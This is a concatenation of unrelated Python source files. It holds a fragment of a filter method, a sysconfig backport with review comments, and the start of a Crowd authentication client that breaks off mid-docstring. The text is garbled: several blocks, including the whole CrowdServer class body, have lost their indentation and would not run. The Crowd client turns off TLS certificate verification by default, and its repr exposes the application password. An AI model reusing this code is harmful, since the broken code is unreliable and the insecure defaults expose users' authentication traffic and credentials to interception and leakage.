        >>> h.filter(name='jean', age = '18', gender ='!female')
        '''
        # NOTE(review): assumes each kwarg value is a string (the '!' prefix
        # test indexes value[0]) -- confirm against callers.
        a = self
        for k in kwargs:
            if kwargs[k][0] == '!':
                a = a[a.__getattr__(k) != kwargs[k][1:]]
            else:
                a = a[a.__getattr__(k) == kwargs[k]]
        return a
| |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""Access to Python's configuration information."""
import codecs
import os
import re
import sys
from os.path import pardir, realpath
try:
import configparser
except ImportError:
import ConfigParser as configparser
# Public API of this sysconfig backport (mirrors the stdlib module's names).
__all__ = [
    'get_config_h_filename',
    'get_config_var',
    'get_config_vars',
    'get_makefile_filename',
    'get_path',
    'get_path_names',
    'get_paths',
    'get_platform',
    'get_python_version',
    'get_scheme_names',
    'parse_config_h',
]
def _safe_realpath(path):
    """Return ``realpath(path)``; if the OS call fails, return *path* as-is."""
    try:
        resolved = realpath(path)
    except OSError:
        resolved = path
    return resolved
# Determine the directory the interpreter runs from; used to detect
# source-checkout ("python build") layouts below.
if sys.executable:
    _PROJECT_BASE = os.path.dirname(_safe_realpath(sys.executable))
else:
    # sys.executable can be empty if argv[0] has been changed and Python is
    # unable to retrieve the real program name
    _PROJECT_BASE = _safe_realpath(os.getcwd())

# On Windows build trees the executable lives in a subdirectory of the
# source root; hop up to the root for each known layout.
if os.name == "nt" and "pcbuild" in _PROJECT_BASE[-8:].lower():
    _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir))
# PC/VS7.1
if os.name == "nt" and "\\pc\\v" in _PROJECT_BASE[-10:].lower():
    _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
# PC/AMD64
if os.name == "nt" and "\\pcbuild\\amd64" in _PROJECT_BASE[-14:].lower():
    _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
def is_python_build():
    """True when running from a CPython source checkout (detected by the
    presence of Modules/Setup.dist or Modules/Setup.local under the base)."""
    return any(
        os.path.isfile(os.path.join(_PROJECT_BASE, "Modules", fn))
        for fn in ("Setup.dist", "Setup.local"))
# Computed once at import; True when running out of a source checkout.
_PYTHON_BUILD = is_python_build()

# Guards one-time loading of sysconfig.cfg into _SCHEMES (see _ensure_cfg_read).
_cfg_read = False
def _ensure_cfg_read():
    """Load sysconfig.cfg into _SCHEMES exactly once (idempotent)."""
    global _cfg_read
    if not _cfg_read:
        from ..resources import finder
        # Locate sysconfig.cfg inside this backport package's own resources.
        backport_package = __name__.rsplit('.', 1)[0]
        _finder = finder(backport_package)
        _cfgfile = _finder.find('sysconfig.cfg')
        assert _cfgfile, 'sysconfig.cfg exists'
        with _cfgfile.as_stream() as s:
            # NOTE(review): readfp is deprecated in py3 configparser
            # (read_file is the replacement); kept for py2 compatibility.
            _SCHEMES.readfp(s)
        if _PYTHON_BUILD:
            # In a source build the headers live in the checkout, not the
            # install prefix; point the include paths there.
            for scheme in ('posix_prefix', 'posix_home'):
                _SCHEMES.set(scheme, 'include', '{srcdir}/Include')
                _SCHEMES.set(scheme, 'platinclude', '{projectbase}/.')
        _cfg_read = True
# Install-scheme definitions (populated lazily by _ensure_cfg_read) and the
# {var} interpolation pattern shared by the substitution helpers below.
_SCHEMES = configparser.RawConfigParser()
_VAR_REPL = re.compile(r'\{([^{]*?)\}')
def _expand_globals(config):
    """Fold the [globals] section into every other section of *config*
    (without overriding options a section already sets), then expand local
    {var} references within each section.  Mutates *config* in place."""
    _ensure_cfg_read()
    if config.has_section('globals'):
        globals = config.items('globals')   # NOTE: shadows the builtin name
    else:
        globals = tuple()

    sections = config.sections()
    for section in sections:
        if section == 'globals':
            continue
        for option, value in globals:
            # Section-local settings win over the global defaults.
            if config.has_option(section, option):
                continue
            config.set(section, option, value)
    # RawConfigParser.remove_section is a no-op (returns False) when the
    # section is absent, so this is safe unconditionally.
    config.remove_section('globals')

    # now expanding local variables defined in the cfg file
    #
    for section in config.sections():
        variables = dict(config.items(section))

        def _replacer(matchobj):
            # Unknown {name} tokens are left untouched.
            name = matchobj.group(1)
            if name in variables:
                return variables[name]
            return matchobj.group(0)

        for option, value in config.items(section):
            config.set(section, option, _VAR_REPL.sub(_replacer, value))
#_expand_globals(_SCHEMES)

# Full version string, e.g. '3.11.4' (first whitespace-delimited token of
# sys.version, which may carry a pre-release suffix).
_PY_VERSION = sys.version.split()[0]
# Built from sys.version_info rather than slicing sys.version: string
# slicing breaks for two-digit minor versions (3.10+ would yield '3.1').
_PY_VERSION_SHORT = '%s.%s' % sys.version_info[:2]
_PY_VERSION_SHORT_NO_DOT = '%s%s' % sys.version_info[:2]
_PREFIX = os.path.normpath(sys.prefix)
_EXEC_PREFIX = os.path.normpath(sys.exec_prefix)
# Populated lazily by get_config_vars() / the user-base helpers.
_CONFIG_VARS = None
_USER_BASE = None
def _subst_vars(path, local_vars):
    """In the string `path`, replace tokens like {some.thing} with the
    corresponding value from the map `local_vars`.

    If there is no corresponding value, leave the token unchanged.
    """
    def _lookup(match):
        token = match.group(1)
        # local_vars wins, then the process environment; otherwise keep the
        # token verbatim.
        if token in local_vars:
            return local_vars[token]
        if token in os.environ:
            return os.environ[token]
        return match.group(0)
    return _VAR_REPL.sub(_lookup, path)
def _extend_dict(target_dict, other_dict):
    """Copy into *target_dict* every item of *other_dict* whose key is absent
    (existing entries are never overwritten)."""
    existing = target_dict.keys()
    for key, value in other_dict.items():
        if key in existing:
            continue
        target_dict[key] = value
def _expand_vars(scheme, vars):
    """Return the paths of install *scheme* with {var} tokens substituted
    from *vars* (augmented with the global config vars), user-expanded and
    normalized."""
    if vars is None:
        vars = {}
    _extend_dict(vars, get_config_vars())

    expanded = {}
    for key, value in _SCHEMES.items(scheme):
        if os.name in ('posix', 'nt'):
            value = os.path.expanduser(value)
        expanded[key] = os.path.normpath(_subst_vars(value, vars))
    return expanded
def format_value(value, vars):
    """Interpolate {name} tokens in *value* from the *vars* mapping,
    leaving unknown tokens untouched."""
    def _lookup(match):
        token = match.group(1)
        if token in vars:
            return vars[token]
        return match.group(0)
    return _VAR_REPL.sub(_lookup, value)
def _get_default_scheme():
    """Name of the default install scheme for the running platform."""
    # All POSIX platforms share one default scheme; elsewhere os.name
    # doubles as the scheme name.
    return 'posix_prefix' if os.name == 'posix' else os.name
def _getuserbase():
    """Return the per-user base directory; PYTHONUSERBASE always wins when set."""
    env_base = os.environ.get("PYTHONUSERBASE", None)

    def joinuser(*args):
        return os.path.expanduser(os.path.join(*args))

    # what about 'os2emx', 'riscos' ?
    if os.name == "nt":
        base = os.environ.get("APPDATA") or "~"
        return env_base if env_base else joinuser(base, "Python")

    if sys.platform == "darwin":
        framework = get_config_var("PYTHONFRAMEWORK")
        if framework:
            return env_base if env_base else joinuser(
                "~", "Library", framework, "%d.%d" % sys.version_info[:2])

    return env_base if env_base else joinuser("~", ".local")
def _parse_makefile(filename, vars=None):
    """Parse a Makefile-style file.

    A dictionary containing name/value pairs is returned.  If an
    optional dictionary is passed in as the second argument, it is
    used instead of a new dictionary.
    """
    # Regexes needed for parsing Makefile (and similar syntaxes,
    # like old-style Setup files).  Raw strings: "\s" / "\$" in plain
    # string literals are invalid escapes (SyntaxWarning on modern Python).
    _variable_rx = re.compile(r"([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)")
    _findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)")
    _findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}")

    if vars is None:
        vars = {}
    done = {}       # fully-resolved variables (ints where possible)
    notdone = {}    # values still containing $(...) / ${...} references

    with codecs.open(filename, encoding='utf-8', errors="surrogateescape") as f:
        lines = f.readlines()

    for line in lines:
        if line.startswith('#') or line.strip() == '':
            continue
        m = _variable_rx.match(line)
        if m:
            n, v = m.group(1, 2)
            v = v.strip()
            # `$$' is a literal `$' in make
            tmpv = v.replace('$$', '')

            if "$" in tmpv:
                notdone[n] = v
            else:
                try:
                    v = int(v)
                except ValueError:
                    # insert literal `$'
                    done[n] = v.replace('$$', '$')
                else:
                    done[n] = v

    # do variable interpolation here
    variables = list(notdone.keys())

    # Variables with a 'PY_' prefix in the makefile. These need to
    # be made available without that prefix through sysconfig.
    # Special care is needed to ensure that variable expansion works, even
    # if the expansion uses the name without a prefix.
    renamed_variables = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS')

    while len(variables) > 0:
        for name in tuple(variables):
            value = notdone[name]
            m = _findvar1_rx.search(value) or _findvar2_rx.search(value)
            if m is not None:
                n = m.group(1)
                found = True
                if n in done:
                    item = str(done[n])
                elif n in notdone:
                    # get it on a subsequent round
                    found = False
                elif n in os.environ:
                    # do it like make: fall back to environment
                    item = os.environ[n]
                elif n in renamed_variables:
                    if (name.startswith('PY_') and
                        name[3:] in renamed_variables):
                        item = ""
                    elif 'PY_' + n in notdone:
                        found = False
                    else:
                        item = str(done['PY_' + n])
                else:
                    done[n] = item = ""

                if found:
                    after = value[m.end():]
                    value = value[:m.start()] + item + after
                    if "$" in after:
                        # More references remain: try again next round.
                        notdone[name] = value
                    else:
                        try:
                            value = int(value)
                        except ValueError:
                            done[name] = value.strip()
                        else:
                            done[name] = value
                        variables.remove(name)

                        # Also publish PY_-prefixed variables unprefixed.
                        if (name.startswith('PY_') and
                            name[3:] in renamed_variables):
                            name = name[3:]
                            if name not in done:
                                done[name] = value
            else:
                # bogus variable reference (e.g. "prefix=$/opt/python");
                # just drop it since we can't deal
                done[name] = value
                variables.remove(name)

    # strip spurious spaces
    for k, v in done.items():
        if isinstance(v, str):
            done[k] = v.strip()

    # save the results in the global dictionary
    vars.update(done)
    return vars
def get_makefile_filename():
    """Return the path of the Makefile."""
    if _PYTHON_BUILD:
        # Running from a source checkout/build tree.
        return os.path.join(_PROJECT_BASE, "Makefile")
    # Installed layout: the Makefile lives in an ABI-qualified config dir
    # when the interpreter exposes ``sys.abiflags``.
    abiflags = getattr(sys, 'abiflags', None)
    if abiflags is None:
        config_dir_name = 'config'
    else:
        config_dir_name = 'config-%s%s' % (_PY_VERSION_SHORT, abiflags)
    return os.path.join(get_path('stdlib'), config_dir_name, 'Makefile')
def _init_posix(vars):
    """Initialize the module as appropriate for POSIX systems."""
    def _unreadable(path, exc):
        # Re-raise as IOError with a message naming the offending file.
        msg = "invalid Python installation: unable to open %s" % path
        if hasattr(exc, "strerror"):
            msg = msg + " (%s)" % exc.strerror
        raise IOError(msg)

    # load the installed Makefile:
    makefile = get_makefile_filename()
    try:
        _parse_makefile(makefile, vars)
    except IOError as e:
        _unreadable(makefile, e)
    # load the installed pyconfig.h:
    config_h = get_config_h_filename()
    try:
        with open(config_h) as f:
            parse_config_h(f, vars)
    except IOError as e:
        _unreadable(config_h, e)
    # On AIX, there are wrong paths to the linker scripts in the Makefile
    # -- these paths are relative to the Python source, but when installed
    # the scripts are in another directory.
    if _PYTHON_BUILD:
        vars['LDSHARED'] = vars['BLDSHARED']
def _init_non_posix(vars):
    """Initialize the module as appropriate for NT"""
    # Basic install directories come straight from the path scheme.
    vars['LIBDEST'] = get_path('stdlib')
    vars['BINLIBDEST'] = get_path('platstdlib')
    vars['INCLUDEPY'] = get_path('include')
    # Windows-specific file-extension and version constants.
    vars['SO'] = '.pyd'
    vars['EXE'] = '.exe'
    vars['VERSION'] = _PY_VERSION_SHORT_NO_DOT
    # Directory holding the (realpath'd) interpreter executable.
    exe_path = _safe_realpath(sys.executable)
    vars['BINDIR'] = os.path.dirname(exe_path)
#
# public APIs
#
def parse_config_h(fp, vars=None):
    """Parse a config.h-style file.

    A dictionary containing name/value pairs is returned.  If an
    optional dictionary is passed in as the second argument, it is
    used instead of a new dictionary.
    """
    if vars is None:
        vars = {}
    define_rx = re.compile("#define ([A-Z][A-Za-z0-9_]+) (.*)\n")
    undef_rx = re.compile("/[*] #undef ([A-Z][A-Za-z0-9_]+) [*]/\n")
    # fp.readline() yields '' at EOF, which terminates the iterator.
    for line in iter(fp.readline, ''):
        defined = define_rx.match(line)
        if defined:
            name, value = defined.group(1, 2)
            try:
                # Numeric defines are stored as ints ...
                value = int(value)
            except ValueError:
                # ... everything else stays a string.
                pass
            vars[name] = value
            continue
        undefined = undef_rx.match(line)
        if undefined:
            vars[undefined.group(1)] = 0
    return vars
def get_config_h_filename():
    """Return the path of pyconfig.h."""
    if not _PYTHON_BUILD:
        # Installed Python: header lives in the platform include dir.
        inc_dir = get_path('platinclude')
    elif os.name == "nt":
        # Windows source tree keeps pyconfig.h under PC/.
        inc_dir = os.path.join(_PROJECT_BASE, "PC")
    else:
        inc_dir = _PROJECT_BASE
    return os.path.join(inc_dir, 'pyconfig.h')
def get_scheme_names():
    """Return a tuple containing the schemes names."""
    names = sorted(_SCHEMES.sections())
    return tuple(names)
def get_path_names():
    """Return a tuple containing the paths names."""
    # xxx see if we want a static list
    # NOTE(review): ConfigParser.options() normally returns a list, not the
    # tuple the docstring promises -- confirm whether callers rely on that.
    return _SCHEMES.options('posix_prefix')
def get_paths(scheme=_get_default_scheme(), vars=None, expand=True):
    """Return a mapping containing an install scheme.

    ``scheme`` is the install scheme name. If not provided, it will
    return the default scheme for the current platform.
    """
    _ensure_cfg_read()
    # Without expansion, hand back the raw scheme entries verbatim.
    if not expand:
        return dict(_SCHEMES.items(scheme))
    return _expand_vars(scheme, vars)
def get_path(name, scheme=_get_default_scheme(), vars=None, expand=True):
    """Return a path corresponding to the scheme.

    ``scheme`` is the install scheme name.
    """
    paths = get_paths(scheme, vars, expand)
    return paths[name]
def get_config_vars(*args):
    """With no arguments, return a dictionary of all configuration
    variables relevant for the current platform.

    On Unix, this means every variable defined in Python's installed Makefile;
    On Windows and Mac OS it's a much smaller set.

    With arguments, return a list of values that result from looking up
    each argument in the configuration variable dictionary.

    The dictionary is computed once and cached in ``_CONFIG_VARS``.
    """
    global _CONFIG_VARS
    if _CONFIG_VARS is None:
        _CONFIG_VARS = {}
        # Normalized versions of prefix and exec_prefix are handy to have;
        # in fact, these are the standard versions used most places in the
        # distutils2 module.
        _CONFIG_VARS['prefix'] = _PREFIX
        _CONFIG_VARS['exec_prefix'] = _EXEC_PREFIX
        _CONFIG_VARS['py_version'] = _PY_VERSION
        _CONFIG_VARS['py_version_short'] = _PY_VERSION_SHORT
        _CONFIG_VARS['py_version_nodot'] = _PY_VERSION[0] + _PY_VERSION[2]
        _CONFIG_VARS['base'] = _PREFIX
        _CONFIG_VARS['platbase'] = _EXEC_PREFIX
        _CONFIG_VARS['projectbase'] = _PROJECT_BASE
        try:
            _CONFIG_VARS['abiflags'] = sys.abiflags
        except AttributeError:
            # sys.abiflags may not be defined on all platforms.
            _CONFIG_VARS['abiflags'] = ''

        if os.name in ('nt', 'os2'):
            _init_non_posix(_CONFIG_VARS)
        if os.name == 'posix':
            _init_posix(_CONFIG_VARS)
        # Setting 'userbase' is done below the call to the
        # init function to enable using 'get_config_var' in
        # the init-function.
        # NOTE(review): lexicographic version comparison is fragile but kept
        # for backward compatibility; it is always true on Python 3.
        if sys.version >= '2.6':
            _CONFIG_VARS['userbase'] = _getuserbase()

        if 'srcdir' not in _CONFIG_VARS:
            _CONFIG_VARS['srcdir'] = _PROJECT_BASE
        else:
            _CONFIG_VARS['srcdir'] = _safe_realpath(_CONFIG_VARS['srcdir'])

        # Convert srcdir into an absolute path if it appears necessary.
        # Normally it is relative to the build directory. However, during
        # testing, for example, we might be running a non-installed python
        # from a different directory.
        if _PYTHON_BUILD and os.name == "posix":
            base = _PROJECT_BASE
            try:
                cwd = os.getcwd()
            except OSError:
                cwd = None
            if (not os.path.isabs(_CONFIG_VARS['srcdir']) and
                    base != cwd):
                # srcdir is relative and we are not in the same directory
                # as the executable. Assume executable is in the build
                # directory and make srcdir absolute.
                srcdir = os.path.join(base, _CONFIG_VARS['srcdir'])
                _CONFIG_VARS['srcdir'] = os.path.normpath(srcdir)

        if sys.platform == 'darwin':
            kernel_version = os.uname()[2]  # Kernel version (8.4.3)
            major_version = int(kernel_version.split('.')[0])

            if major_version < 8:
                # On macOS before 10.4, check if -arch and -isysroot
                # are in CFLAGS or LDFLAGS and remove them if they are.
                # This is needed when building extensions on a 10.3 system
                # using a universal build of python.
                for key in ('LDFLAGS', 'BASECFLAGS',
                            # a number of derived variables. These need to be
                            # patched up as well.
                            'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'):
                    flags = _CONFIG_VARS[key]
                    # BUG FIX: regex patterns are now raw strings so '\s'
                    # and '\w' are regex escapes rather than (deprecated)
                    # invalid string escape sequences.
                    flags = re.sub(r'-arch\s+\w+\s', ' ', flags)
                    flags = re.sub(r'-isysroot [^ \t]*', ' ', flags)
                    _CONFIG_VARS[key] = flags
            else:
                # Allow the user to override the architecture flags using
                # an environment variable.
                # NOTE: This name was introduced by Apple in OSX 10.5 and
                # is used by several scripting languages distributed with
                # that OS release.
                if 'ARCHFLAGS' in os.environ:
                    arch = os.environ['ARCHFLAGS']
                    for key in ('LDFLAGS', 'BASECFLAGS',
                                # a number of derived variables. These need to be
                                # patched up as well.
                                'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'):
                        flags = _CONFIG_VARS[key]
                        flags = re.sub(r'-arch\s+\w+\s', ' ', flags)
                        flags = flags + ' ' + arch
                        _CONFIG_VARS[key] = flags

                # If we're on OSX 10.5 or later and the user tries to
                # compiles an extension using an SDK that is not present
                # on the current machine it is better to not use an SDK
                # than to fail.
                #
                # The major usecase for this is users using a Python.org
                # binary installer on OSX 10.6: that installer uses
                # the 10.4u SDK, but that SDK is not installed by default
                # when you install Xcode.
                #
                CFLAGS = _CONFIG_VARS.get('CFLAGS', '')
                m = re.search(r'-isysroot\s+(\S+)', CFLAGS)
                if m is not None:
                    sdk = m.group(1)
                    if not os.path.exists(sdk):
                        for key in ('LDFLAGS', 'BASECFLAGS',
                                    # a number of derived variables. These need to be
                                    # patched up as well.
                                    'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'):
                            flags = _CONFIG_VARS[key]
                            flags = re.sub(r'-isysroot\s+\S+(\s|$)', ' ', flags)
                            _CONFIG_VARS[key] = flags

    if args:
        vals = []
        for name in args:
            vals.append(_CONFIG_VARS.get(name))
        return vals
    else:
        return _CONFIG_VARS
def get_config_var(name):
    """Return the value of a single variable using the dictionary returned by
    'get_config_vars()'.

    Equivalent to get_config_vars().get(name)
    """
    all_vars = get_config_vars()
    return all_vars.get(name)
def get_platform():
    """Return a string that identifies the current platform.

    This is used mainly to distinguish platform-specific build directories and
    platform-specific built distributions. Typically includes the OS name
    and version and the architecture (as supplied by 'os.uname()'),
    although the exact information included depends on the OS; eg. for IRIX
    the architecture isn't particularly important (IRIX only runs on SGI
    hardware), but for Linux the kernel version isn't particularly
    important.

    Examples of returned values:
        linux-i586
        linux-alpha (?)
        solaris-2.6-sun4u
        irix-5.3
        irix64-6.2

    Windows will return one of:
        win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc)
        win-ia64 (64bit Windows on Itanium)
        win32 (all others - specifically, sys.platform is returned)

    For other non-POSIX platforms, currently just returns 'sys.platform'.
    """
    if os.name == 'nt':
        # sniff sys.version for architecture.
        prefix = " bit ("
        i = sys.version.find(prefix)
        if i == -1:
            return sys.platform
        j = sys.version.find(")", i)
        look = sys.version[i + len(prefix):j].lower()
        if look == 'amd64':
            return 'win-amd64'
        if look == 'itanium':
            return 'win-ia64'
        return sys.platform

    if os.name != "posix" or not hasattr(os, 'uname'):
        # XXX what about the architecture? NT is Intel or Alpha,
        # Mac OS is M68k or PPC, etc.
        return sys.platform

    # Try to distinguish various flavours of Unix
    osname, host, release, version, machine = os.uname()

    # Convert the OS name to lowercase, remove '/' characters
    # (to accommodate BSD/OS), and translate spaces (for "Power Macintosh")
    osname = osname.lower().replace('/', '')
    machine = machine.replace(' ', '_')
    machine = machine.replace('/', '-')

    if osname[:5] == "linux":
        # At least on Linux/Intel, 'machine' is the processor --
        # i386, etc.
        # XXX what about Alpha, SPARC, etc?
        return "%s-%s" % (osname, machine)
    elif osname[:5] == "sunos":
        if release[0] >= "5":  # SunOS 5 == Solaris 2
            osname = "solaris"
            release = "%d.%s" % (int(release[0]) - 3, release[2:])
        # fall through to standard osname-release-machine representation
    elif osname[:4] == "irix":  # could be "irix64"!
        return "%s-%s" % (osname, release)
    elif osname[:3] == "aix":
        return "%s-%s.%s" % (osname, version, release)
    elif osname[:6] == "cygwin":
        osname = "cygwin"
        rel_re = re.compile(r'[\d.]+')
        m = rel_re.match(release)
        if m:
            release = m.group()
    elif osname[:6] == "darwin":
        #
        # For our purposes, we'll assume that the system version from
        # distutils' perspective is what MACOSX_DEPLOYMENT_TARGET is set
        # to. This makes the compatibility story a bit more sane because the
        # machine is going to compile and link as if it were
        # MACOSX_DEPLOYMENT_TARGET.
        cfgvars = get_config_vars()
        macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET')

        # Always calculate the release of the running machine,
        # needed to determine if we can build fat binaries or not.
        # (A vestigial ``if True:`` that wrapped this section has been
        # removed; behavior is unchanged.)
        macrelease = macver
        # Get the system version. Reading this plist is a documented
        # way to get the system version (see the documentation for
        # the Gestalt Manager)
        try:
            f = open('/System/Library/CoreServices/SystemVersion.plist')
        except IOError:
            # We're on a plain darwin box, fall back to the default
            # behaviour.
            pass
        else:
            try:
                m = re.search(r'<key>ProductUserVisibleVersion</key>\s*'
                              r'<string>(.*?)</string>', f.read())
            finally:
                f.close()
            if m is not None:
                macrelease = '.'.join(m.group(1).split('.')[:2])
            # else: fall back to the default behaviour

        if not macver:
            macver = macrelease

        if macver:
            release = macver
            osname = "macosx"
            if ((macrelease + '.') >= '10.4.' and
                    '-arch' in get_config_vars().get('CFLAGS', '').strip()):
                # The universal build will build fat binaries, but not on
                # systems before 10.4
                #
                # Try to detect 4-way universal builds, those have machine-type
                # 'universal' instead of 'fat'.
                machine = 'fat'
                cflags = get_config_vars().get('CFLAGS')
                # BUG FIX: raw string so '\s'/'\S' are regex escapes rather
                # than (deprecated) invalid string escapes.
                archs = re.findall(r'-arch\s+(\S+)', cflags)
                archs = tuple(sorted(set(archs)))
                if len(archs) == 1:
                    machine = archs[0]
                elif archs == ('i386', 'ppc'):
                    machine = 'fat'
                elif archs == ('i386', 'x86_64'):
                    machine = 'intel'
                elif archs == ('i386', 'ppc', 'x86_64'):
                    machine = 'fat3'
                elif archs == ('ppc64', 'x86_64'):
                    machine = 'fat64'
                elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'):
                    machine = 'universal'
                else:
                    raise ValueError(
                        "Don't know machine value for archs=%r" % (archs,))
            elif machine == 'i386':
                # On OSX the machine type returned by uname is always the
                # 32-bit variant, even if the executable architecture is
                # the 64-bit variant
                if sys.maxsize >= 2**32:
                    machine = 'x86_64'
            elif machine in ('PowerPC', 'Power_Macintosh'):
                # Pick a sane name for the PPC architecture.
                # See 'i386' case
                if sys.maxsize >= 2**32:
                    machine = 'ppc64'
                else:
                    machine = 'ppc'

    return "%s-%s-%s" % (osname, release, machine)
def get_python_version():
    """Return the short Python version string (``_PY_VERSION_SHORT``)."""
    return _PY_VERSION_SHORT
def _print_dict(title, data):
for index, (key, value) in enumerate(sorted(data.items())):
if index == 0:
print('%s: ' % (title))
print('\t%s = "%s"' % (key, value))
def _main():
    """Display all information sysconfig contains."""
    # Print platform/version/scheme first; get_paths() and
    # get_config_vars() are invoked lazily in display order so any
    # one-time initialisation they perform happens here.
    print('Platform: "%s"' % get_platform())
    print('Python version: "%s"' % get_python_version())
    print('Current installation scheme: "%s"' % _get_default_scheme())
    print()
    _print_dict('Paths', get_paths())
    print()
    _print_dict('Variables', get_config_vars())


if __name__ == '__main__':
    _main()
| |
# Copyright 2012 Alexander Else <aelse@else.id.au>.
#
# This file is part of the python-crowd library.
#
# python-crowd is free software released under the BSD License.
# Please see the LICENSE file included in this distribution for
# terms of use. This LICENSE is also available at
# https://github.com/aelse/python-crowd/blob/master/LICENSE
import json
import requests
import xmltodict
class CrowdAuthFailure(Exception):
    """A failure occurred while performing an authentication operation"""
    # Raised e.g. by auth_user()/get_session() when Crowd answers HTTP 400.
    pass
class CrowdAuthDenied(Exception):
    """Crowd server refused to perform the operation"""
    # Raised when the application account lacks permission (HTTP 403).
    pass
class CrowdUserExists(Exception):
    """Raised when creating a user, or adding a group member, that the
    Crowd server reports as already existing."""
    pass
class CrowdNoSuchUser(Exception):
    """Raised when the Crowd server reports that the requested user
    does not exist."""
    pass
class CrowdGroupExists(Exception):
    """Raised when creating a group that the Crowd server reports as
    already existing (HTTP 400)."""
    pass
class CrowdNoSuchGroup(Exception):
    """Raised when the Crowd server reports that the requested group
    does not exist."""
    pass
class CrowdError(Exception):
    """Generic exception when unexpected response encountered"""

    def __init__(self, message=None):
        # Fall back to a generic description when no detail is supplied.
        Exception.__init__(
            self, message or "unexpected response from Crowd server")
class CrowdServer(object):
"""Crowd server authentication object.
This is a Crowd authentication class to be configured for a
particular application (app_name) to authenticate users
against a Crowd server (crowd_url).
This module uses the Crowd JSON API for talking to Crowd.
An application account must be configured in the Crowd server
and permitted to authenticate users against one or more user
directories prior to using this module.
Please see the Crowd documentation for information about
configuring additional applications to talk to Crowd.
The ``ssl_verify`` parameter controls how and if certificates are verified.
If ``True``, the SSL certificate will be verified.
A CA_BUNDLE path can also be provided.
"""
def __init__(self, crowd_url, app_name, app_pass, ssl_verify=False, timeout=None):
    """Create a connection to a Crowd server.

    Args:
        crowd_url: Base URL of the Crowd server.
        app_name: Application account name registered in Crowd.
        app_pass: Application account password.
        ssl_verify: Passed through to requests: ``True`` verifies the
            SSL certificate; a CA_BUNDLE path may also be given.
        timeout: Default request timeout in seconds (``None`` = no
            timeout), stored for use by the HTTP wrapper methods.
    """
    self.crowd_url = crowd_url
    self.app_name = app_name
    self.app_pass = app_pass
    # All REST calls go through version 1 of the usermanagement API.
    self.rest_url = crowd_url.rstrip("/") + "/rest/usermanagement/1"
    self.timeout = timeout
    # One shared session: basic auth as the application, JSON in/out.
    self.session = requests.Session()
    self.session.verify = ssl_verify
    self.session.auth = requests.auth.HTTPBasicAuth(app_name, app_pass)
    self.session.headers.update({
        "Content-type": "application/json",
        "Accept": "application/json"
    })
def __str__(self):
return "Crowd Server at %s" % self.crowd_url
def __repr__(self):
return "<CrowdServer('%s', '%s', '%s')>" % \
(self.crowd_url, self.app_name, self.app_pass)
def _get(self, *args, **kwargs):
"""Wrapper around Requests for GET requests
Returns:
Response:
A Requests Response object
"""
req = self.session.get(*args, **kwargs)
return req
def _post(self, *args, **kwargs):
"""Wrapper around Requests for POST requests
Returns:
Response:
A Requests Response object
"""
req = self.session.post(*args, **kwargs)
return req
def _put(self, *args, **kwargs):
"""Wrapper around Requests for PUT requests
Returns:
Response:
A Requests Response object
"""
if 'timeout' not in kwargs:
kwargs['timeout'] = self.timeout
req = self.session.put(*args, **kwargs)
return req
def _delete(self, *args, **kwargs):
"""Wrapper around Requests for DELETE requests
Returns:
Response:
A Requests Response object
"""
req = self.session.delete(*args, **kwargs)
return req
def auth_ping(self):
"""Test that application can authenticate to Crowd.
Attempts to authenticate the application user against
the Crowd server. In order for user authentication to
work, an application must be able to authenticate.
Returns:
bool:
True if the application authentication succeeded.
Raises:
CrowdError: If auth ping could not be completed.
"""
url = self.rest_url + "/non-existent/location"
response = self._get(url)
if response.status_code == 401:
return False
if response.status_code == 404:
# A 'not found' response indicates we passed app auth
return True
# An error encountered - problem with the Crowd server?
raise CrowdError("unidentified problem")
def auth_user(self, username, password):
"""Authenticate a user account against the Crowd server.
Attempts to authenticate the user against the Crowd server.
Args:
username: The account username.
password: The account password.
Returns:
dict:
A dict mapping of user attributes if the application
authentication was successful. See the Crowd documentation
for the authoritative list of attributes.
None: If received negative authentication response
Raises:
CrowdAuthFailure:
If authentication attempt failed (other than negative response)
"""
response = self._post(self.rest_url + "/authentication",
data=json.dumps({"value": password}),
params={"username": username})
if response.status_code == 200:
return response.json()
if response.status_code == 400:
j = response.json()
raise CrowdAuthFailure(j['message'])
raise CrowdError
def get_session(self, username, password=None, remote="127.0.0.1"):
"""Create a session for a user.
Attempts to create a user session on the Crowd server.
Args:
username: The account username.
password: The account password.
remote:
The remote address of the user. This can be used
to create multiple concurrent sessions for a user.
The host you run this program on may need to be configured
in Crowd as a trusted proxy for this to work.
Returns:
dict:
A dict mapping of user attributes if the application
authentication was successful. See the Crowd
documentation for the authoritative list of attributes.
Raises:
CrowdAuthFailure: If authentication failed.
"""
data = {
"username": username,
"password": password,
"validation-factors": {
"validationFactors": [
{"name": "remote_address", "value": remote, }
]
}
}
if password is None:
params = {"expand": "user", "validate-password": "false"}
else:
params = {"expand": "user"}
response = self._post(self.rest_url + "/session",
data=json.dumps(data),
params=params)
if response.status_code == 201:
return response.json()
if response.status_code == 400:
j = response.json()
raise CrowdAuthFailure(j['message'])
raise CrowdError
def validate_session(self, token, remote="127.0.0.1"):
"""Validate a session token.
Validate a previously acquired session token against the
Crowd server. This may be a token provided by a user from
a http cookie or by some other means.
Args:
token: The session token.
remote: The remote address of the user.
Returns:
dict:
A dict mapping of user attributes if the application
authentication was successful. See the Crowd
documentation for the authoritative list of attributes.
Raises:
CrowdAuthFailure: If authentication failed.
"""
params = {
"validationFactors": [
{"name": "remote_address", "value": remote, }
]
}
url = self.rest_url + "/session/%s" % token
response = self._post(url, data=json.dumps(params),
params={"expand": "user"})
# If token validation failed for any reason raise exception
if not response.ok:
raise CrowdAuthFailure
# Otherwise return the user object
return response.json()
def terminate_session(self, token):
"""Terminates the session token, effectively logging out the user
from all crowd-enabled services.
Args:
token: The session token.
Returns:
